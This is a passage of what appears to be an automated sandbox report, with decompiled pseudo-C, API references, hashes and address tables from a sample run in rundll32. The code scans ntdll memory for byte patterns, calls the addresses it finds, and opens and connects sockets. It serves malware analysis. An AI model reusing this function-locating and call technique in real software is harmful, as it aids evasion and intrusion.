                                                            																_t223 = _t223 + 1;
                                                            															} while (_t223 <= _t203);
                                                            															return E04655AFE(_v8 ^ _t227);
                                                            														}
                                                            													} else {
                                                            														_t225 = 0;
                                                            														_v20 = 0x8b55ff8b;
                                                            														_v16 = 0x56ec;
                                                            														_t209 = _t198 + 0xfffffff9;
                                                            														_v14 = 0x68;
                                                            														_v312 = 0x38e05d89;
                                                            														do {
                                                            															_t169 = 0;
                                                            															asm("o16 nop [eax+eax]");
                                                            															while( *((intOrPtr*)(_t169 + _t225 + _t191)) ==  *((intOrPtr*)(_t227 + _t169 - 0x10))) {
                                                            																_t169 = _t169 + 1;
                                                            																if(_t169 < 7) {
                                                            																	continue;
                                                            																}
                                                            																break;
                                                            															}
                                                            															if(_t169 == 7) {
                                                            																_t153 = _t225 + _t191;
                                                            																if(_t153 == 0) {
                                                            																	goto L90;
                                                            																} else {
                                                            																	_t224 = 0;
                                                            																	_t211 = _v320 + 0xfffffffc;
                                                            																	do {
                                                            																		_t170 = 0;
                                                            																		asm("o16 nop [eax+eax]");
                                                            																		while( *((intOrPtr*)(_t170 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t170 - 0x134))) {
                                                            																			_t170 = _t170 + 1;
                                                            																			if(_t170 < 4) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		if(_t170 == 4) {
                                                            																			L76:
                                                            																			_t125 =  *((intOrPtr*)(_t224 + _t191 + 0x1b));
                                                            																			if( *((intOrPtr*)(_t224 + _t191 + 0x1b)) == 0) {
                                                            																				goto L90;
                                                            																			} else {
                                                            																				 *_t153(_v324,  *((intOrPtr*)(_v316 + 0x50)));
                                                            																				return E04655AFE(_v8 ^ _t227, _t125);
                                                            																			}
                                                            																		} else {
                                                            																			goto L58;
                                                            																		}
                                                            																		goto L92;
                                                            																		L58:
                                                            																		_t224 = _t224 + 1;
                                                            																	} while (_t224 <= _t211);
                                                            																	return E04655AFE(_v8 ^ _t227);
                                                            																}
                                                            															} else {
                                                            																goto L50;
                                                            															}
                                                            															goto L92;
                                                            															L50:
                                                            															_t225 = _t225 + 1;
                                                            														} while (_t225 <= _t209);
                                                            														return E04655AFE(_v8 ^ _t227);
                                                            													}
                                                            												}
                                                            											}
                                                            										} else {
                                                            											if(_v300 != 0) {
                                                            												goto L90;
                                                            											} else {
                                                            												_t175 = _v296;
                                                            												if(_t175 < 0x3fab) {
                                                            													if(_t175 - 0x3ad7 > 0x4d3) {
                                                            														if(_t175 < 0x3ad7) {
                                                            															L35:
                                                            															_t150 = 0;
                                                            															_v20 = 0x8b575653;
                                                            															_t221 = 0;
                                                            															_v16 = 0x50f98bda;
                                                            															_v32 = 0x89f4458d;
                                                            															_t200 = _t198 + 0xfffffff8;
                                                            															_v28 = 0x8d50f855;
                                                            															_v24 = 0xfc55;
                                                            															do {
                                                            																_t158 = 0;
                                                            																while( *((intOrPtr*)(_t158 + _t221 + _t191)) ==  *((intOrPtr*)(_t227 + _t158 - 0x10))) {
                                                            																	_t158 = _t158 + 1;
                                                            																	if(_t158 < 8) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																if(_t158 == 8) {
                                                            																	_t150 = _t191 - 0xb + _t221;
                                                            																} else {
                                                            																	goto L40;
                                                            																}
                                                            																L79:
                                                            																if(_t150 != 0) {
                                                            																	L89:
                                                            																	 *_t150();
                                                            																} else {
                                                            																	_t222 = 0;
                                                            																	_t202 = _v320 + 0xfffffff6;
                                                            																	do {
                                                            																		_t160 = 0;
                                                            																		while( *((intOrPtr*)(_t160 + _t222 + _t191)) ==  *((intOrPtr*)(_t227 + _t160 - 0x1c))) {
                                                            																			_t160 = _t160 + 1;
                                                            																			if(_t160 < 0xa) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		if(_t160 == 0xa) {
                                                            																			_t150 = _t191 - 0xb + _t222;
                                                            																		} else {
                                                            																			goto L85;
                                                            																		}
                                                            																		L88:
                                                            																		if(_t150 != 0) {
                                                            																			goto L89;
                                                            																		}
                                                            																		goto L90;
                                                            																		L85:
                                                            																		_t222 = _t222 + 1;
                                                            																	} while (_t222 <= _t202);
                                                            																	goto L88;
                                                            																}
                                                            																goto L90;
                                                            																L40:
                                                            																_t221 = _t221 + 1;
                                                            															} while (_t221 <= _t200);
                                                            															goto L79;
                                                            														}
                                                            														goto L90;
                                                            													} else {
                                                            														_t226 = 0;
                                                            														_v20 = 0x89f0458d;
                                                            														_v16 = 0x8d50f855;
                                                            														_t214 = _t198 + 0xfffffff6;
                                                            														_v12 = 0xf455;
                                                            														do {
                                                            															_t176 = 0;
                                                            															while( *((intOrPtr*)(_t176 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t176 - 0x10))) {
                                                            																_t176 = _t176 + 1;
                                                            																if(_t176 < 0xa) {
                                                            																	continue;
                                                            																}
                                                            																break;
                                                            															}
                                                            															if(_t176 == 0xa) {
                                                            																_t139 = _t191 - 0xb;
                                                            																goto L32;
                                                            															} else {
                                                            																goto L29;
                                                            															}
                                                            															goto L92;
                                                            															L29:
                                                            															_t226 = _t226 + 1;
                                                            														} while (_t226 <= _t214);
                                                            														return E04655AFE(_v8 ^ _t227);
                                                            													}
                                                            												} else {
                                                            													_t226 = 0;
                                                            													_v20 = 0x8d575653;
                                                            													_v16 = 0xfa8bf845;
                                                            													_t217 = _t198 + 0xfffffff8;
                                                            													do {
                                                            														_t182 = 0;
                                                            														while( *((intOrPtr*)(_t182 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t182 - 0x10))) {
                                                            															_t182 = _t182 + 1;
                                                            															if(_t182 < 8) {
                                                            																continue;
                                                            															}
                                                            															break;
                                                            														}
                                                            														if(_t182 == 8) {
                                                            															_t139 = _t191 - 8;
                                                            															L32:
                                                            															_t140 = _t139 + _t226;
                                                            															if(_t140 == 0) {
                                                            																goto L90;
                                                            															} else {
                                                            																 *_t140();
                                                            																return E04655AFE(_v8 ^ _t227);
                                                            															}
                                                            														} else {
                                                            															goto L20;
                                                            														}
                                                            														goto L92;
                                                            														L20:
                                                            														_t226 = _t226 + 1;
                                                            													} while (_t226 <= _t217);
                                                            													return E04655AFE(_v8 ^ _t227);
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L92:
			}
                                                            0x00000000
                                                            0x0463c6a9
                                                            0x0463c6a9
                                                            0x0463c6aa
                                                            0x0463c6be
                                                            0x0463c6be
                                                            0x0463c678
                                                            0x0463c666
                                                            0x0463c659
                                                            0x0463c642
                                                            0x0463c607
                                                            0x0463c5f0
                                                            0x0463c5d1
                                                            0x0463c5c0
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll,00000000,74CB43E0), ref: 0463C58C
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0463C5B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: RtlGetVersion$h$ntdll$V
                                                            • API String ID: 1646373207-3705289206
                                                            • Opcode ID: 54c389e704a7102ca63f7fc963a37f5d774b3ca38117b306484705259554f047
                                                            • Instruction ID: be7c33abd227b84f0fb789af9c80164ee60c2a956fb80acdf8b34ccb0b0b8aa5
                                                            • Opcode Fuzzy Hash: 54c389e704a7102ca63f7fc963a37f5d774b3ca38117b306484705259554f047
                                                            • Instruction Fuzzy Hash: 75C13533A001988BCB348F58D4D46BDB7B0FF56315F6511AED9966B291FA31A942CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 23%
                                                            			E04653DA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int* _a20, signed short* _a24) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				intOrPtr* _v32;
                                                            				intOrPtr* _v36;
                                                            				signed short _v50;
                                                            				char _v52;
                                                            				long _v56;
                                                            				signed int* _v60;
                                                            				intOrPtr _v64;
                                                            				void* _v76;
                                                            				intOrPtr* _v116;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v136;
                                                            				signed int _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				long _v160;
                                                            				signed int _v164;
                                                            				intOrPtr _v168;
                                                            				signed int _v184;
                                                            				char _v188;
                                                            				intOrPtr _v192;
                                                            				intOrPtr _v196;
                                                            				signed int _v208;
                                                            				intOrPtr _v212;
                                                            				char _v216;
                                                            				signed int _t124;
                                                            				signed short _t127;
                                                            				void* _t128;
                                                            				signed int _t129;
                                                            				signed int _t130;
                                                            				signed int* _t131;
                                                            				intOrPtr _t132;
                                                            				signed int* _t135;
                                                            				void* _t137;
                                                            				signed int _t139;
                                                            				void* _t141;
                                                            				signed int _t144;
                                                            				intOrPtr _t154;
                                                            				signed int _t156;
                                                            				long _t160;
                                                            				long _t163;
                                                            				signed int _t165;
                                                            				signed int _t174;
                                                            				void* _t175;
                                                            				signed int _t176;
                                                            				long _t177;
                                                            				signed int _t180;
                                                            				signed int _t185;
                                                            				signed int _t187;
                                                            				long _t188;
                                                            				signed short _t191;
                                                            				signed int* _t195;
                                                            				signed int _t206;
                                                            				signed int _t209;
                                                            				signed int* _t210;
                                                            				signed int _t211;
                                                            				intOrPtr _t213;
                                                            				void* _t214;
                                                            				long _t222;
                                                            				signed int _t223;
                                                            				signed int _t225;
                                                            				intOrPtr* _t228;
                                                            				signed int _t229;
                                                            				signed int _t243;
                                                            				intOrPtr _t250;
                                                            				signed int _t252;
                                                            				signed int _t257;
                                                            				signed int _t261;
                                                            				signed short* _t265;
                                                            				intOrPtr* _t266;
                                                            				signed int _t268;
                                                            				signed int _t269;
                                                            				long _t270;
                                                            				intOrPtr _t277;
                                                            				signed short* _t278;
                                                            				signed int _t279;
                                                            				struct _CRITICAL_SECTION* _t281;
                                                            				intOrPtr _t283;
                                                            				intOrPtr _t285;
                                                            				signed int _t291;
                                                            				signed int _t292;
                                                            				signed int _t293;
                                                            				signed int _t294;
                                                            				void* _t295;
                                                            				signed int _t296;
                                                            				signed int _t297;
                                                            
                                                            				_t124 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t124 ^ _t291;
                                                            				_push(__ebx);
                                                            				_t209 = _a12;
                                                            				_push(__esi);
                                                            				_t277 = __ecx;
                                                            				_v56 = _a4;
                                                            				_v60 = _a20;
                                                            				_push(__edi);
                                                            				_t265 = _a24;
                                                            				_v64 = __ecx;
                                                            				_t127 = E0464D020(_a4, __ecx);
                                                            				_t250 = _a8;
                                                            				_t222 = _v56;
                                                            				 *_t265 = _t127;
                                                            				_push(_t265);
                                                            				if(_t127 == 0) {
                                                            					_t128 = E0464D160(_t209, _t222, _t250, _t265, __ecx, __eflags);
                                                            				} else {
                                                            					_t128 = E0464D0D0(_t209, _t250, _t265, __ecx);
                                                            				}
                                                            				_t296 = _t295 + 4;
                                                            				if(_t128 != 0) {
                                                            					_t278 = _t277 + 0x5c;
                                                            					__eflags = _t209;
                                                            					if(_t209 == 0) {
                                                            						L9:
                                                            						_t129 =  *_t278 & 0x0000ffff;
                                                            						__eflags = _t129 - 2;
                                                            						if(_t129 == 2) {
                                                            							L14:
                                                            							_v56 = 1;
                                                            							__eflags = _t129 -  *_t265;
                                                            							if(_t129 ==  *_t265) {
                                                            								goto L12;
                                                            							} else {
                                                            								goto L35;
                                                            							}
                                                            						} else {
                                                            							__eflags = _t129 - 0x17;
                                                            							if(_t129 == 0x17) {
                                                            								goto L14;
                                                            							} else {
                                                            								_v56 = 0;
                                                            								L12:
                                                            								_t130 =  *_t265 & 0x0000ffff;
                                                            								_t210 = 0;
                                                            								__imp__#23(_t130, 1, 6);
                                                            								_t223 = _t130;
                                                            								_t131 = _v60;
                                                            								 *_t131 = _t223;
                                                            								__eflags = _t223 - 0xffffffff;
                                                            								if(_t223 != 0xffffffff) {
                                                            									_t132 = _v64;
                                                            									__eflags =  *(_t132 + 0x30);
                                                            									if( *(_t132 + 0x30) == 0) {
                                                            										L19:
                                                            										_t252 = 0;
                                                            										__eflags = 0;
                                                            									} else {
                                                            										__eflags =  *(_t132 + 0x34);
                                                            										if( *(_t132 + 0x34) <= 0) {
                                                            											goto L19;
                                                            										} else {
                                                            											_t252 = 1;
                                                            										}
                                                            									}
                                                            									_v20 = _t252;
                                                            									_v12 =  *(_t132 + 0x34);
                                                            									_t135 =  &_v20;
                                                            									_v16 =  *(_t132 + 0x30);
                                                            									__imp__WSAIoctl(_t223, 0x98000004, _t135, 0xc, 0, 0,  &_v24, 0, 0);
                                                            									__eflags = _t135 - 0xffffffff;
                                                            									if(_t135 != 0xffffffff) {
                                                            										L23:
                                                            										_t223 =  *_v60;
                                                            										_t137 = E0464D490(_t210, _t223,  *((intOrPtr*)(_v64 + 4)), _t265, _t278);
                                                            										__eflags = _t137 - 0xffffffff;
                                                            										if(_t137 == 0xffffffff) {
                                                            											goto L37;
                                                            										} else {
                                                            											_t243 = _a16;
                                                            											__eflags = _t243;
                                                            											if(_t243 != 0) {
                                                            												__eflags = _v56 - _t210;
                                                            												if(_v56 == _t210) {
                                                            													__eflags =  *_t265 - 2;
                                                            													_t278 =  !=  ? 0x46866e4 : 0x46866c8;
                                                            												}
                                                            												asm("movups xmm0, [esi]");
                                                            												_t30 =  &(_t278[0xc]); // 0x0
                                                            												_t191 =  *_t30;
                                                            												asm("movups [ebp-0x30], xmm0");
                                                            												_v28 = _t191;
                                                            												asm("movq xmm0, [esi+0x10]");
                                                            												asm("movq [ebp-0x20], xmm0");
                                                            												__imp__#9(_t243);
                                                            												__eflags = _v52 - 2;
                                                            												_v50 = _t191;
                                                            												_t193 =  ==  ? 0x10 : 0x1c;
                                                            												__eflags = 0x1c;
                                                            												_push( ==  ? 0x10 : 0x1c);
                                                            												_push( &_v52);
                                                            											} else {
                                                            												__eflags = _v56 - _t210;
                                                            												if(_v56 == _t210) {
                                                            													__eflags =  *_t265 - 2;
                                                            													_t278 =  !=  ? 0x46866e4 : 0x46866c8;
                                                            												}
                                                            												__eflags =  *_t278 - 2;
                                                            												_t200 =  !=  ? 0x1c : 0x10;
                                                            												_push( !=  ? 0x1c : 0x10);
                                                            												_push(_t278);
                                                            											}
                                                            											_t195 = _v60;
                                                            											__imp__#2( *_t195);
                                                            											__eflags = _t195 - 0xffffffff;
                                                            											if(_t195 == 0xffffffff) {
                                                            												_t131 =  *__imp__#111();
                                                            												goto L33;
                                                            											}
                                                            											goto L34;
                                                            										}
                                                            									} else {
                                                            										__imp__#111();
                                                            										__eflags = _t135 - 0x2733;
                                                            										if(_t135 == 0x2733) {
                                                            											goto L23;
                                                            										} else {
                                                            											__eflags = _t135 - 0xffffffff;
                                                            											if(_t135 == 0xffffffff) {
                                                            												_push(0x80004005);
                                                            												E04637AC0();
                                                            												L37:
                                                            												_push(0x80004005);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												_push(_t291);
                                                            												_t292 = _t296;
                                                            												_push(_t210);
                                                            												_push(_t278);
                                                            												_t211 = _t223;
                                                            												_push(_t265);
                                                            												_t266 = _v116;
                                                            												_t279 = _t211 + 0x178;
                                                            												_t139 = L04655300(_t279, _t223, _t266);
                                                            												__eflags = _t139;
                                                            												if(_t139 != 0) {
                                                            													SetLastError(0);
                                                            													_t225 = _t211;
                                                            													_t141 =  *((intOrPtr*)( *_t211 + 0xd8))( *_t266, _a4);
                                                            													__eflags = _t141 - 2;
                                                            													if(_t141 != 2) {
                                                            														__eflags = 0;
                                                            														return 0;
                                                            													} else {
                                                            														_t213 =  *_t266;
                                                            														_t268 =  *(_t279 + 4);
                                                            														__eflags = _t268;
                                                            														if(_t268 == 0) {
                                                            															L47:
                                                            															_push(0x80004005);
                                                            															E04637AC0();
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															_push(_t292);
                                                            															_t293 = _t296;
                                                            															_t297 = _t296 - 0x18;
                                                            															_t144 =  *0x4684008; // 0xd355be4e
                                                            															_v148 = _t144 ^ _t293;
                                                            															_push(_t213);
                                                            															_push(_t279);
                                                            															_v152 = _v136;
                                                            															_push(_t268);
                                                            															_t269 = _t225;
                                                            															_v156 = _v128;
                                                            															_v168 = _v124;
                                                            															_v164 = _t269;
                                                            															_v160 = 0;
                                                            															__eflags = E0464C880(_t269 + 0xb0,  &_v160);
                                                            															if(__eflags != 0) {
                                                            																_t214 = _v28;
                                                            															} else {
                                                            																_t285 =  *((intOrPtr*)(_t269 + 0xa4));
                                                            																_t214 = RtlAllocateHeap( *(_t269 + 0x94), 0, _t285 + 0x38);
                                                            																_v28 = _t214;
                                                            																_t68 = _t214 + 0x38; // 0x38
                                                            																 *(_t214 + 0x14) = _t269 + 0x94;
                                                            																 *((intOrPtr*)(_t214 + 0x24)) = _t285;
                                                            																 *((intOrPtr*)(_t214 + 0x20)) = _t68;
                                                            															}
                                                            															_push(_v24);
                                                            															asm("xorps xmm0, xmm0");
                                                            															_push(_v20);
                                                            															asm("movups [ebx], xmm0");
                                                            															 *(_t214 + 0x10) = 0;
                                                            															 *(_t214 + 0x1c) = 0;
                                                            															 *(_t214 + 0x1c) =  *(_t269 + 0x18);
                                                            															_t270 = E046527F0(_t269, __eflags);
                                                            															_t79 = _t270 + 0x54; // 0x54
                                                            															_t281 = _t79;
                                                            															EnterCriticalSection(_t281);
                                                            															_push(_a12);
                                                            															_t228 = _v32;
                                                            															E04652A10(_t228, _t281, _v20, _t270, _v36, _t269);
                                                            															_t154 = _v32;
                                                            															__eflags =  *(_t154 + 0x4c);
                                                            															if( *(_t154 + 0x4c) == 0) {
                                                            																_t228 = _v36;
                                                             																__eflags =  *_t228 - 2; // sockaddr family compared with AF_INET (2)
                                                             																_t156 =  !=  ? 0x1c : 0x10; // sizeof(sockaddr_in6) : sizeof(sockaddr_in)
                                                             																__imp__#4( *(_t270 + 0x88), _t228, 0x10); // ws2_32 ordinal 4: connect(s, name, namelen)
                                                             																__eflags = 0x10 - 0xffffffff;
                                                             																if(0x10 == 0xffffffff) { // connect() == SOCKET_ERROR (the decompiler shows the return value as the constant 0x10)
                                                             																	__imp__#111(); // ws2_32 ordinal 111: WSAGetLastError()
                                                            																	goto L63;
                                                            																} else {
                                                            																	_t163 =  &_v20;
                                                            																	_v20 = 1;
                                                             																	__imp__#10( *(_t270 + 0x88), 0x8004667e, _t163); // ws2_32 ordinal 10: ioctlsocket(s, FIONBIO, &1) puts the socket in non-blocking mode
                                                            																	__eflags = _t163;
                                                            																	if(_t163 != 0) {
                                                            																		goto L70;
                                                            																	} else {
                                                             																		_t174 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t163); // associate the socket with the existing IOCP at _v32+0x50, completion key = _t270
                                                            																		__eflags = _t174;
                                                            																		if(_t174 == 0) {
                                                            																			goto L55;
                                                            																		} else {
                                                            																			 *(_t270 + 0x48) = 1;
                                                            																			_t175 = E046520F0(_v32, _t270);
                                                            																			__eflags = _t175 - 2;
                                                            																			if(_t175 == 2) {
                                                            																				_t176 = GetLastError();
                                                            																				__eflags = _t176;
                                                             																				_t156 =  ==  ? 0x4c7 : _t176; // ERROR_CANCELLED (1223) when GetLastError() returned 0
                                                            																				goto L63;
                                                            																			} else {
                                                            																				_t156 = E04653AC0(_t214, _v32, _t270, _t281, _t270, _t214);
                                                            																				_t229 = 0;
                                                            																			}
                                                            																		}
                                                            																		goto L64;
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t177 =  &_v24;
                                                            																_v24 = 1;
                                                             																__imp__#10( *(_t270 + 0x88), 0x8004667e, _t177); // ws2_32 ordinal 10: ioctlsocket(s, FIONBIO, &1), non-blocking mode
                                                            																__eflags = _t177;
                                                            																if(_t177 != 0) {
                                                             																	_push(0x80004005); // E_FAIL
                                                            																	E04637AC0();
                                                            																	L70:
                                                            																	E04637AC0();
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	_t294 = _t297;
                                                            																	_t165 =  *0x4684008; // 0xd355be4e
                                                            																	_v208 = _t165 ^ _t294;
                                                            																	_t257 = _v184;
                                                            																	__eflags = _t257;
                                                            																	_t283 = _v192;
                                                            																	_v216 = _v188;
                                                            																	_t169 =  ==  ? _t283 : _t283 + _t257;
                                                            																	_v212 =  ==  ? _t283 : _t283 + _t257;
                                                            																	 *((intOrPtr*)( *_t228 + 8))( &_v216, 1, _t281, _t293, 0x80004005);
                                                            																	__eflags = _v208 ^ _t294;
                                                            																	return E04655AFE(_v208 ^ _t294, _v196);
                                                            																} else {
                                                             																	_t180 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t177); // associate the socket with the IOCP at _v32+0x50, completion key = _t270
                                                            																	__eflags = _t180;
                                                            																	if(_t180 == 0) {
                                                            																		L55:
                                                            																		_t156 = GetLastError();
                                                            																	} else {
                                                            																		_t156 = E0464D560( *((intOrPtr*)(_v32 + 0x40)),  *(_t270 + 0x88), _v36, _t214);
                                                            																	}
                                                            																	L63:
                                                            																	_t229 = 1;
                                                            																	L64:
                                                            																	_v28 = _t156;
                                                            																	__eflags = _t156;
                                                            																	if(_t156 != 0) {
                                                            																		__eflags = _t229;
                                                            																		if(_t229 != 0) {
                                                            																			E04652920(_v32, _t270, 0, 0, 0);
                                                            																			_t160 = E0464C930(_v32 + 0xb0, _t214);
                                                            																			__eflags = _t160;
                                                            																			if(_t160 == 0) {
                                                            																				HeapFree( *( *(_t214 + 0x14)), _t160, _t214);
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																	LeaveCriticalSection(_t281);
                                                            																	__eflags = _v16 ^ _t293;
                                                             																	return E04655AFE(_v16 ^ _t293); // stack-cookie check before return
                                                            																}
                                                            															}
                                                            														} else {
                                                            															_t185 = _t213 - 1;
                                                            															_t261 = _t185 %  *_t279;
                                                            															_t225 =  *( *((intOrPtr*)(_t279 + 0x44)) + _t261) & 0x000000ff;
                                                            															__eflags = _t185 /  *_t279 - _t225;
                                                            															if(_t185 /  *_t279 != _t225) {
                                                            																goto L47;
                                                            															} else {
                                                            																__eflags =  *((intOrPtr*)(_t268 + _t261 * 4)) - 1;
                                                            																if( *((intOrPtr*)(_t268 + _t261 * 4)) != 1) {
                                                            																	goto L47;
                                                            																} else {
                                                            																	_t296 = _t296 - 8;
                                                            																	_t225 = _t279;
                                                            																	_t187 = E046551B0(_t213, _t225, _t268, _t279, _t213, 0);
                                                            																	__eflags = _t187;
                                                            																	if(_t187 == 0) {
                                                            																		goto L47;
                                                            																	} else {
                                                            																		_t188 = GetLastError();
                                                            																		__eflags = _t188;
                                                             																		_t189 =  ==  ? 0x4c7 : _t188; // ERROR_CANCELLED (1223) when GetLastError() returned 0
                                                             																		return  ==  ? 0x4c7 : _t188;
                                                            																	}
                                                            																}
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                             													return 0x4d6; // ERROR_CONNECTION_COUNT_LIMIT (1238)
                                                            												}
                                                            											} else {
                                                            												goto L23;
                                                            											}
                                                            										}
                                                            									}
                                                            								} else {
                                                             									__imp__#111(); // ws2_32 ordinal 111: WSAGetLastError()
                                                            									L33:
                                                            									_t210 = _t131;
                                                            									L34:
                                                            									goto L35;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						__eflags =  *_t209;
                                                            						if( *_t209 == 0) {
                                                            							goto L9;
                                                            						} else {
                                                            							L04671B10();
                                                            							_t278 = _t296;
                                                            							 *_t278 = E0464D020(_t209, _t278);
                                                            							_t206 = E0464D0D0(_t209, 0, _t265, _t278, _t278);
                                                            							_t296 = _t296 + 4;
                                                            							__eflags = _t206;
                                                            							if(_t206 != 0) {
                                                            								goto L9;
                                                            							} else {
                                                             								__imp__#111(); // ws2_32 ordinal 111: WSAGetLastError()
                                                            								goto L35;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					L35:
                                                             					return E04655AFE(_v8 ^ _t291); // stack-cookie check before return
                                                            				}
                                                            			}

Instruction addresses for the decompiled listing, one per listing line in order (0x00000000 where no address is recorded):

0x04653da6 0x04653dad 0x04653db3 0x04653db4 0x04653db7 0x04653db8 0x04653dba 0x04653dc0
0x04653dc5 0x04653dc6 0x04653dc9 0x04653dcc 0x04653dd1 0x04653dd4 0x04653dd7 0x04653dda
0x04653dde 0x04653de7 0x04653de0 0x04653de0 0x04653de0 0x04653dec 0x04653df1 0x04653dfd
0x04653e00 0x04653e02 0x04653e3c 0x04653e3c 0x04653e3f 0x04653e42 0x04653e77 0x04653e77
0x04653e7e 0x04653e81 0x00000000 0x04653e83 0x00000000 0x04653e83 0x04653e44 0x04653e44
0x04653e47 0x00000000 0x04653e49 0x04653e49 0x04653e50 0x04653e50 0x04653e53 0x04653e5a
0x04653e60 0x04653e62 0x04653e65 0x04653e67 0x04653e6a 0x04653e8d 0x04653e93 0x04653e95
0x04653ea3 0x04653ea3 0x04653ea3 0x04653e97 0x04653e97 0x04653e9a 0x00000000 0x04653e9c
0x04653e9c 0x04653e9c 0x04653e9a 0x04653ea9 0x04653eb2 0x04653ebf 0x04653ec2 0x04653ecc
0x04653ed2 0x04653ed5 0x04653eed 0x04653ef3 0x04653ef8 0x04653efd 0x04653f00 0x00000000
0x04653f06 0x04653f06 0x04653f09 0x04653f0c 0x04653f39 0x04653f3c 0x04653f3e 0x04653f4c
0x04653f4c 0x04653f4f 0x04653f52 0x04653f52 0x04653f56 0x04653f5a 0x04653f5d 0x04653f62
0x04653f67 0x04653f6d 0x04653f77 0x04653f80 0x04653f80 0x04653f83 0x04653f87 0x04653f0e
0x04653f0e 0x04653f11 0x04653f13 0x04653f21 0x04653f21 0x04653f24 0x04653f32 0x04653f35
0x04653f36 0x04653f36 0x04653f88 0x04653f8d 0x04653f93 0x04653f96 0x04653f9d 0x00000000
0x04653f9d 0x00000000 0x04653f96 0x04653ed7 0x04653ed7 0x04653edd 0x04653ee2 0x00000000
0x04653ee4 0x04653ee4 0x04653ee7 0x04653fb9 0x04653fbe 0x04653fc3 0x04653fc3 0x04653fc8
0x04653fcd 0x04653fce 0x04653fcf 0x04653fd0 0x04653fd1 0x04653fd2 0x04653fd3 0x04653fd4
0x04653fd5 0x04653fd6 0x04653fd7 0x04653fd8 0x04653fd9 0x04653fda 0x04653fdb 0x04653fdc
0x04653fdd 0x04653fde 0x04653fdf 0x04653fe0 0x04653fe1 0x04653fe3 0x04653fe4 0x04653fe5
0x04653fe7 0x04653fe8 0x04653fec 0x04653ff5 0x04653ffa 0x04653ffc 0x0465400c 0x04654017
0x0465401b 0x04654021 0x04654024 0x04654071 0x04654075 0x04654026 0x04654026 0x04654028
0x0465402b 0x0465402d 0x04654078 0x04654078 0x0465407d 0x04654082 0x04654083 0x04654084
0x04654085 0x04654086 0x04654087 0x04654088 0x04654089 0x0465408a 0x0465408b 0x0465408c
0x0465408d 0x0465408e 0x0465408f 0x04654090 0x04654091 0x04654093 0x04654096 0x0465409d
0x046540a3 0x046540a4 0x046540a5 0x046540ab 0x046540ac 0x046540ae 0x046540b4 0x046540c1
0x046540c4 0x046540d0 0x046540d2 0x04654105 0x046540d4 0x046540d4 0x046540ec 0x046540f4
0x046540f7 0x046540fa 0x046540fd 0x04654100 0x04654100 0x04654108 0x0465410b 0x04654110
0x04654113 0x04654116 0x0465411d 0x04654127
                                                            0x0465412f
                                                            0x04654131
                                                            0x04654131
                                                            0x04654135
                                                            0x0465413b
                                                            0x04654142
                                                            0x04654149
                                                            0x0465414e
                                                            0x04654151
                                                            0x04654155
                                                            0x046541bb
                                                            0x046541c8
                                                            0x046541cc
                                                            0x046541d7
                                                            0x046541dd
                                                            0x046541e0
                                                            0x04654253
                                                            0x00000000
                                                            0x046541e2
                                                            0x046541e2
                                                            0x046541e5
                                                            0x046541f8
                                                            0x046541fe
                                                            0x04654200
                                                            0x00000000
                                                            0x04654206
                                                            0x04654214
                                                            0x0465421a
                                                            0x0465421c
                                                            0x00000000
                                                            0x0465421e
                                                            0x04654222
                                                            0x04654229
                                                            0x0465422e
                                                            0x04654231
                                                            0x04654241
                                                            0x04654247
                                                            0x0465424e
                                                            0x00000000
                                                            0x04654233
                                                            0x04654238
                                                            0x0465423d
                                                            0x0465423d
                                                            0x04654231
                                                            0x00000000
                                                            0x0465421c
                                                            0x04654200
